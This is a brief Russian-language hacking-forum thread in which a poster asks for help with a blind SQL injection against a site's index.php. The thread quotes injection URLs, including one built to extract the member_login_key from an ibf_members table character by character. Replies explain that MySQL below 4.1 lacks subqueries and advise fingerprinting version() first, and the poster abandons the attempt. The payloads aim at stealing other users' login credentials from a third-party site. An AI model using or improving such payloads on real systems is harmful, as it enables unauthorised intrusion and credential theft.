![]() |
Blind SQL-Inj. Нужна помощь...
Есть скрипт, подверженный Blind SQL-инъекции:
Код:
index.php?show=item&id=29+order+by+id'+and+ascii(lower(substring(user(),1,1)))>1/*Если вместо user() поставить (select+member_login_key+from+ibf_members+where+id =2), чтоб было вот так: Код:
index.php?show=item&id=29+order+by+id'+and+ascii(lower(substring((select+member_login_key+from+ibf_members+where+id=2),1,1)))>1/*Цитата:
Кто-нить знает, почему выдается эта ошибка, и как это обойти? Запрос ведь верный вроде... |
версия mysql ниже 4.1 не поддерживает подзапросов
|
Согласен с бр сначало надо пробить version()
|
Цитата:
Версия 4.0.27-log :( По всей видимости придётся забить на эту дырку. :( Всем спасибо. |
Закрыто значит.
|
| Время: 07:49 |